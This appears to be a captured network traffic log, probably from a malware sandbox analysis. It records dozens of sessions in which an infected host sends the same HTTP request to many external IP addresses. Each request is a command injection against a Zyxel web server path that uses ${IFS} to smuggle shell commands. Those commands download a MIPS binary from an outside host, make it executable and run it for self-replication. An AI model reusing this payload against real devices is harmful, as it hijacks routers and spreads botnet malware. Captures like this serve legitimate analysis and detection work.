                                                      Feb 2, 2024 06:35:45.462742090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2398192.168.2.143368439.219.194.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462774038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2399192.168.2.144047219.80.85.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462810040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2400192.168.2.1453808189.2.251.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462837934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2401192.168.2.143566497.248.216.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462886095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2402192.168.2.143522082.119.244.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462929010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2403192.168.2.1435262102.204.115.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462970972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2404192.168.2.146045486.25.170.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463012934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2405192.168.2.1452938223.35.146.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463079929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2406192.168.2.145921653.133.52.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463112116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2407192.168.2.1440524181.41.117.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463152885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2408192.168.2.145787497.69.187.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463202000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2409192.168.2.1448614150.27.59.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463255882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2410192.168.2.1439146187.0.21.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463318110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2411192.168.2.1433946134.130.226.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463335037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2412192.168.2.1439462197.34.39.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463376999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2413192.168.2.145296676.16.179.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463417053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2414192.168.2.1438656148.212.2.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463476896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2415192.168.2.145991048.95.217.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463504076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2416192.168.2.1451646191.253.188.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463563919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2417192.168.2.144234447.230.34.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463594913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2418192.168.2.1460450131.118.151.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463641882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2419192.168.2.145360044.3.179.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463665009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2420192.168.2.144748499.86.202.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463691950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2421192.168.2.1441210183.163.135.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463721991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2422192.168.2.1457442139.57.1.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463781118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2423192.168.2.1441082200.134.204.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463820934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2424192.168.2.1442268222.99.107.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463867903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2425192.168.2.1433592197.57.160.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463896036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2426192.168.2.1448080106.20.223.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463923931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2427192.168.2.1442274141.209.85.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463943005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2428192.168.2.145669658.177.96.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.463995934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2429192.168.2.1445408208.133.250.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464046001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2430192.168.2.1454216221.155.110.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464091063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2431192.168.2.1453852147.109.216.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464123964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2432192.168.2.1437048159.169.39.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464168072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2433192.168.2.1452628195.114.208.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464189053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2434192.168.2.1439056178.218.122.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464240074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2435192.168.2.144127423.30.68.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464270115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2436192.168.2.1441152145.26.222.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464332104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2437192.168.2.145045083.84.62.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464366913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2438192.168.2.144370491.252.221.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464406967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2439192.168.2.144886447.239.180.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464431047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2440192.168.2.1443206155.139.216.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464469910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2441192.168.2.144941040.231.191.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464524984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2442192.168.2.145708850.111.174.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464611053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2443192.168.2.145150418.165.191.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464616060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2444192.168.2.14428424.178.89.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464658022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2445192.168.2.144393451.248.121.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464688063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2446192.168.2.1445750132.176.184.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464725971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2447192.168.2.1460938151.219.52.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464767933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2448192.168.2.1448720141.204.221.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464802027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2449192.168.2.144857837.82.216.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464853048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2450192.168.2.143849038.249.140.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464900017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2451192.168.2.14552505.241.169.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464943886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2452192.168.2.1439068169.233.166.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.464975119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2453192.168.2.1451378219.227.227.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465008974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2454192.168.2.1445936148.84.74.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465086937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2455192.168.2.1457814130.209.138.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465095997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2456192.168.2.146070271.82.98.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465162992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2457192.168.2.1449398141.254.163.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465198040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2458192.168.2.1438668142.172.59.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465257883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2459192.168.2.1442418124.26.234.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465287924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2460192.168.2.1446502108.42.61.174443
                                                      TimestampBytes transferredDirectionData
